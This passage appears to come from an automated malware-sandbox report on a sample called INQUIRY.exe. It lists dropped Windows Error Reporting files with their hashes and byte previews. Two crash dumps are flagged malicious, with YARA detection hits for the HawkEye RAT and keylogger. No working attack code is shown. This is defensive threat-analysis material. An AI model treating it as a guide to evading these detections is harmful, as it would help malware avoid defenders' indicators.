                                                                      Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.0.1.8.1.7.6.0.0.6.9.1.4.6.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.0.1.8.1.7.6.3.0.2.2.2.6.3.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.5.9.7.0.9.0.f.-.0.7.a.4.-.4.7.5.1.-.b.9.c.9.-.7.e.3.7.7.2.5.9.1.0.a.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.9.8.-.0.0.0.1.-.0.0.1.b.-.6.1.2.3.-.c.6.7.6.b.3.b.d.d.6.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.2.9.9.0.e.1.8.8.e.c.d.5.a.7.e.8.7.1.b.9.7.a.6.a.4.c.b.7.b.b.8.0.0.0.0.f.f.f.f.!.0.0.0.0.5.3.a.e.0.b.5.7.6.f.7.b.3.6.2.b.9.0.a.2.5.a.c.e.1.4.7.0.d.3.3.0.6.8.d.b.4.4.9.0.!.I.N.Q.U.I.R.Y...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.0././.1.1././.1.8.:.0.7.:.4.5.:.1.7.!.0.!.I.N.Q.U.I.R.Y...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....T.a.r.g.e.t.A.s.I.d.=.3.7.8.....I.s.F.a.t.a.l.=.4.2.9.4.9.6.7.2.
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B59.tmp.mdmp
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:Mini DuMP crash report, 14 streams, Wed Nov 18 14:02:15 2020, 0x60521 type
                                                                      Category:dropped
                                                                      Size (bytes):7008087
                                                                      Entropy (8bit):4.7220376102848896
                                                                      Encrypted:false
                                                                      SSDEEP:98304:dYMlAY0P5P9Hch291r+VT8b1XanA8ngFYT3bRnCSljd5XSoU+zR8MX:djAYaP9HNgGwFJ/5Xv
                                                                      MD5:B959EB0600252402A18BFCF647E10552
                                                                      SHA1:0626EAF638F4FEF2920A77E3BC56740E52E126C5
                                                                      SHA-256:92E8F1B478C7EB956AD40A33A3739229D6C1ACB0793A32A327CF426C6CCE2A77
                                                                      SHA-512:A61C0109EBA44B3ECECA58A5D3DE320553FEE491B820638D50B266122604F6BD3B75660C745BA011C717FEA2E24C15C4AAFC5D49CCF254478E99D55B5A5EF00C
                                                                      Malicious:true
                                                                      Yara Hits:
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B59.tmp.mdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B59.tmp.mdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B59.tmp.mdmp, Author: JPCERT/CC Incident Response Group
                                                                      Preview: MDMP....... .......g)._!..................U...........B.......8......GenuineIntelW...........T...........M)._.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER2E55.tmp.WERInternalMetadata.xml
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):8294
                                                                      Entropy (8bit):3.7043697131252022
                                                                      Encrypted:false
                                                                      SSDEEP:192:Rrl7r3GLNii06Yb6YPI6Egmf0uuS8+prk89bb9sfnpm:RrlsNiJ6s6Yw6EgmfPuSRb2fE
                                                                      MD5:878E1942EA193A0986BDC8426E80F69E
                                                                      SHA1:D47C31FC7B12BA957F6D61AB8E0C5FFDCE2585D6
                                                                      SHA-256:B31B2972C250517AF12D08CD15DE379C47B1FAA215DF97926D7227400370543A
                                                                      SHA-512:BEBD8D8ECEBD5466E4CBC6303EBEC7879A8D6C02057DADCCA7B56E117F426849E56E3E9BBF21F477C3D2EA83ECC2D55D427F756E57942950AA5826416B2B6426
                                                                      Malicious:false
                                                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.8.9.6.<./.P.i.d.>.......
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER3043.tmp.WERInternalMetadata.xml
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):5640
                                                                      Entropy (8bit):3.724414552767444
                                                                      Encrypted:false
                                                                      SSDEEP:96:RtIU6o7r3GLt3i+s6ROcYZtuvUubSfaQgsB+aM1911fH/m:Rrl7r3GLNi+s6ROcYZtuvUubS7+p191g
                                                                      MD5:3ACCC42FCA2CB02425C8B5FEB60C324D
                                                                      SHA1:2EF2A521BF4C9A6F3FA58C56A803D919B985BBE7
                                                                      SHA-256:2ECDDEC9C38A915BD80665FAFBE7779795C1342454EA3C57D8D682FA52A2089E
                                                                      SHA-512:B0813E81B0FA83DEF1700D5B4199F8CA0A8148B07319D158FE513094230C2A355E977F31BE21656C0A92D8B6B46B38C523E21582FEC509DEDA162DACEF37ADD8
                                                                      Malicious:false
                                                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.4.0.<./.P.i.d.>.........
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER3106.tmp.xml
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):4587
                                                                      Entropy (8bit):4.510625392276364
                                                                      Encrypted:false
                                                                      SSDEEP:48:cvIwSD8zs6JgtWI9OK6oWSC8BP8fm8M4JOWjZF5+q89zCpJP6v4HTd:uITfI4aSNKJOgtsCvP6vMTd
                                                                      MD5:A8469566DD777304B6389CE1094F7028
                                                                      SHA1:E5C9D56772A35FD2D8DCA937B993B3F4C092F9B9
                                                                      SHA-256:507E6016E8640ECE9E662D46F13B0C0322C64175A78028E65A471791CF7EB03D
                                                                      SHA-512:8B6460D77CE2B91024D10532ABD27E990F723E906AABC28F2EC02F85301A9A37953DE7BACEBFA1AD1D85FB11F2ECDD7A443C03F3598C42EBD7A9A48A5FF51F43
                                                                      Malicious:false
                                                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="734352" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER310F.tmp.xml
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):4609
                                                                      Entropy (8bit):4.454622515385555
                                                                      Encrypted:false
                                                                      SSDEEP:48:cvIwSD8zsUJgtWI9OK6oWSC8Bw08fm8M4JFKg7FT9P+q8v5bpJP6v4H+d:uITfS4aSNYJFKMKVvP6vM+d
                                                                      MD5:E90B24327D824129769567901CF443FD
                                                                      SHA1:136452E7C618931A5D39470F24C97B3CE9FB8858
                                                                      SHA-256:27C78A3143AFDA038D4939AED93E3CB8B249CC9032C6568D01BAC4B57B298BAE
                                                                      SHA-512:BE3CA69E21A0B60EDA1C09659DF6968ADA039FC12791ED077D5E1026E587C40DED3E4FD91A75BAEEE238633622C31D183F440CC241D58E08FF789477FB409854
                                                                      Malicious:false
                                                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="734354" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER6231.tmp.WERInternalMetadata.xml
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):5644
                                                                      Entropy (8bit):3.725672845251971
                                                                      Encrypted:false
                                                                      SSDEEP:96:RtIU6o7r3GLt3i4W6hn/OY6TYZtuvUubSfaQgsB+aM1jM1fohm:Rrl7r3GLNi4W6h/OlTYZtuvUubS7+p1k
                                                                      MD5:0EF540DE4DBDF43FBCFEE50AB55FA136
                                                                      SHA1:7ECED9AE0FCF5AAC17BF09D4114C09D2285FC38E
                                                                      SHA-256:8DAEF505D2FE71360A1544D35C3E1ACBE7AE5A4EFF9617AC844B591E55E9DCB1
                                                                      SHA-512:9C771D8C01F602E3732F32990596ED9C8E833AF86C91F507D402CF14B1E5DEBEE53BA9CED202C1BB40F667B4DDB904AB419A4387464F30E5F72D93F60D639D4D
                                                                      Malicious:false
                                                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.3.6.4.<./.P.i.d.>.......
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER6389.tmp.xml
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):4609
                                                                      Entropy (8bit):4.456846137432615
                                                                      Encrypted:false
                                                                      SSDEEP:48:cvIwSD8zsUJgtWI9OK6oWSC8B48fm8M4JFKg7F98+q8v5epJP6v4Hdd:uITfS4aSN3JFKDKovP6vMdd
                                                                      MD5:2ABC6F088DE2C790C718E4B5C042A11F
                                                                      SHA1:663A6B84DE9F3B0284CB8F8F56F68836D59199BA
                                                                      SHA-256:B78C0C1912AF53D5A3855576A4F1759E27E916D0CDDEA8F9ECD6B179302BB31D
                                                                      SHA-512:2145C163BEF734A90F38DB9ABF56E6EDA5BB1E3CE77AC22F5ABE411C4E98191C4DC8B68588BEE18AA157139F546DECF73A2322C7C2326BFDF2870B94A3638C26
                                                                      Malicious:false
                                                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="734354" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER7CAE.tmp.mdmp
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:Mini DuMP crash report, 14 streams, Wed Nov 18 14:03:43 2020, 0x60521 type
                                                                      Category:dropped
                                                                      Size (bytes):7022802
                                                                      Entropy (8bit):4.717144579527239
                                                                      Encrypted:false
                                                                      SSDEEP:98304:XYPlBtHP569HBpwU1r+VTnb1XaFA8nPtYT3bMriGfjTsXDaIoUL8Md:X6Btx69HAV4YQhfsXb
                                                                      MD5:FEAD06C9C1479F402088C5790CB54810
                                                                      SHA1:98E6C5DBB08872323131736E654FA53615B587B4
                                                                      SHA-256:E5C77118B53DF48454D8706ADB3AA5E603848B19056510A90343E9C8229EEBC6
                                                                      SHA-512:BC34879B56421682EF50B6B1EAA7D8CE9D3120567037B8213FC36ACCAB9218CE55125A98552CF3ED34CA2D1E7D98D8F107C0F286F2345EB138C9C351491C32A4
                                                                      Malicious:true
                                                                      Yara Hits:
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER7CAE.tmp.mdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER7CAE.tmp.mdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER7CAE.tmp.mdmp, Author: JPCERT/CC Incident Response Group
                                                                      Preview: MDMP....... ........)._!..................U...........B.......8......GenuineIntelW...........T.......T....)._.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER8867.tmp.WERInternalMetadata.xml
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):6324
                                                                      Entropy (8bit):3.732480537668084
                                                                      Encrypted:false
                                                                      SSDEEP:192:Rrl7r3GLNi4Z6mY0uuS8+prI89bkcsfrsm:RrlsNi+6mYPuSFkvf1
                                                                      MD5:443C182B00527E31B1E4AD64BFFA8241
                                                                      SHA1:F1D745B2744B4224FD43AE752DAA83B8E7FB10E8
                                                                      SHA-256:25D2AD246A4ACEB2DBF6DD75A5DD3B06CC824F525D990939B860A4E259E71E64
                                                                      SHA-512:36978C6151C7001BF4AF5C4D7AB4510EADD05EB048E435BD1C1A61809B4003CB2F6D5AE7F6C9074952C5C121C793F337EF2886D30FE662B18BA622FFE1E1E029
                                                                      Malicious:false
                                                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.3.6.4.<./.P.i.d.>.......
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER8933.tmp.xml
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):4587
                                                                      Entropy (8bit):4.5076470925802195
                                                                      Encrypted:false
                                                                      SSDEEP:48:cvIwSD8zsUJgtWI9OK6oWSC8Bn8fm8M4JOWjZFz+q89z8pJP6v4Hud:uITfS4aSN+JOgns8vP6vMud
                                                                      MD5:52FC903ED30F5B61BA8F727424907241
                                                                      SHA1:40816AF32399226225A46FA9841CC819A894B75A
                                                                      SHA-256:CD4FF732AB018C9AAC4D92F681006C0FB246283D3ADC6A040F8CA7B31F48FF38
                                                                      SHA-512:51706A5090F26418194DFC10146F7D906A7E4E203FFDBE7BFB1FDE179C53FAE6B32AE0134F083A50E07B78FA3B020A968C9CA773CCA4A45A8FEB8AEC48BAAC8B
                                                                      Malicious:false
                                                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="734354" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER89A3.tmp.WERInternalMetadata.xml
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):5644
                                                                      Entropy (8bit):3.727574879681056
                                                                      Encrypted:false
                                                                      SSDEEP:96:RtIU6o7r3GLt3iGQA6pOPYZtuvUubSfaQgsB+aM1YC1fYAUom:Rrl7r3GLNiG/6pAYZtuvUubS7+p1YC1S
                                                                      MD5:B3060F69B30CC0B7BE8A0EEBBC0F66AE
                                                                      SHA1:14ED5EC297764359163C1F4AF27BA5D9CD96F73B
                                                                      SHA-256:E42AE8026F9C077C31416C917B6B9EBE48907C17E9D392B0B900FA94CB1F7121
                                                                      SHA-512:514FE1126AF8F28F5A2E99DD6D8B441CC185879EF3FC73AEE025356DDCA920109D43E26E994BC43E62AB9A15A0181FFDCA346ACE6F14CC4ED7A1B5B915B25D2D
                                                                      Malicious:false
                                                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.8.0.8.<./.P.i.d.>.......
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER8B0B.tmp.xml
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):4609
                                                                      Entropy (8bit):4.456792166327963
                                                                      Encrypted:false
                                                                      SSDEEP:48:cvIwSD8zsBJgtWI9OK6oWSC8BN8fm8M4JFKg7Fi+q8v5mpJP6v4HcHOd:uITfT4aSNwJFK7K0vP6vMiOd
                                                                      MD5:18F66061D1D492E5837EDA572C603EF7
                                                                      SHA1:09D9099E03FF5F8A1A481E9C16C706253EF312C8
                                                                      SHA-256:40F6DA190C8F79EA3E49E49A4FF2165C43FDFA39C281EE54BEC83B22ABAD4810
                                                                      SHA-512:2D7BF15CE4CD127233CDF94E19D653B90D9E3CE4AA6DE49D145DC879CF3F7B4559D16F1D2B3118FAD5B7CE89279EB44B69F85F037D125FEB27E82BAAA80C3B97
                                                                      Malicious:false
                                                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="734353" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB44.tmp.mdmp
